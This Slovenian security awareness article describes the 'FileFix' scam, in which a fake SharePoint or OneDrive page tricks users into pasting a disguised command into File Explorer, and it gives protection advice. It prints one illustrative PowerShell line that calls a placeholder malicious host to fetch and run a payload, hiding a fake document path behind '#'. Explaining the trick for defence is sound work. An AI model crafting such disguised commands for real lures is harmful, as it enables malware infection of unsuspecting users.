Nova oblika spletnega napada: FileFix prevara pri deljenju datotek 

Kibernetska varnost | Novice

Nova oblika spletnega napada: FileFix prevara pri deljenju datotek 

July 23, 2025

Napad FileFix cilja na nepazljivost uporabnikov pri deljenju datotek preko interneta, rezultat pa je učinkovit napad brez tehničnih preprek. Potrebna je le majhna nepazljivost, ki lahko prinese velike posledice.  

V preteklosti so bili to lažni CAPTCHA obrazci

Nemara poznate primere pravar iz preteklosti, kjer so napadalci zlorabili lažne “CAPTCHA” obrazce (»Are you human?«), da so uporabniki sami, nič hudega sluteč, sprožili škodljiv ukaz na svojem računalniku. Prevara je izgledala približno takole:  

Preberite več o lažnih CAPTCHA preverjanjih

Sedaj pa je tu nova različicaFileFix

Napad FileFix cilja na nepazljivost uporabnikov pri deljenju datotek preko interneta. Namesto, da bi se zanašali na viruse ali priponke v sporočilu, napadalci uporabijo zlonamerno spletno stran in nekaj psihologije. Uporabnik namreč misli, da odpira običajno datoteko, v resnici pa sam izvede škodljiv ukaz – pogosto z lepljenjem ene same vrstice v File Explorer. 

Kako FileFix prevara deluje v praksi?

  1. Prejmete povezavo do “dokumenta” 
    • Sporočilo (prek e-pošte, klepeta ipd.) vas povabi, da odprete pomembno datoteko – npr. HRPolicy.docx. 
    • Povezava vodi na zelo verodostojno spletno stran, ki posnema SharePoint, OneDrive ali Microsoft 365. 
  2. Na strani sledite “navodilom” 
    • Odprete File Explorer (s klikom na spletni strani). 
    • Pritisnete CTRL + L (za naslovno vrstico). 
    • Prilepite “pot do datoteke”, ki ste jo prej kopirali. 
  1. Izvedba napada 
    • Namesto poti do dokumenta ste v resnici kopirali nekaj takega: powershell.exe zlonamernaspletnastran.exe#You will begin to download C:\Sharepoint\HRPolicy.docx 
    • Navidezno izgleda kakor običajna pot, a je v ozadju pravzaprav ukaz, ki lahko prenese ali zažene škodljivo datoteko.  
    • Vse za znakom # je tam samo za videz, operacijski sistem to namreč ignorira. 
  2. Z enim pritiskom na “enter” napadalcu omogočite dostop 
    • Ko pritisnete enter, se ukaz izvede in na računalniku se zažene zlonamerna programska oprema, ki se je prenesla na vaš računalnik tekom odpiranja File Explorer-ja. 

Zakaj so taki napadi še posebej nevarni? 

Napad FileFix temelji na prepričljivem videzu spletne strani, ki posnema znane storitve in je zato težko prepoznavna. Ob tem pravzaprav ne izkorišča nobene varnostne ranljivosti, temveč cilja na uporabnikovo zaupanje in rutinske navade pri odpiranju dokumentov. Rezultat je tako učinkovit napad brez tehničnih preprek – vse, kar je potrebno, je nekaj klikov in nepazljiv trenutek. 

Kako se lahko zaščitite? 

Bodite previdni pri kopiranju poti ali ukazov s spletnih strani. To storite le, če popolnoma zaupate viru. Kadar vas spletna stran spodbuja k takšnim dejanjem, se najprej za trenutek ustavite in premislite ter ocenite zaupnost vira. V primeru, da ste ukaz že izvedli, nemudoma obvestite vašo IT ekipo, saj je hiter odziv ključen za omejitev morebitne škode. 

V kolikor imate karšnokoli vprašanje ali potrebujte pomoč s področja kibernetske varnosti nam pišite na prodaja@telprom.si in vam z veseljem pomagamo.

Avtor vsebine: Vid Grosek, certificiran etični heker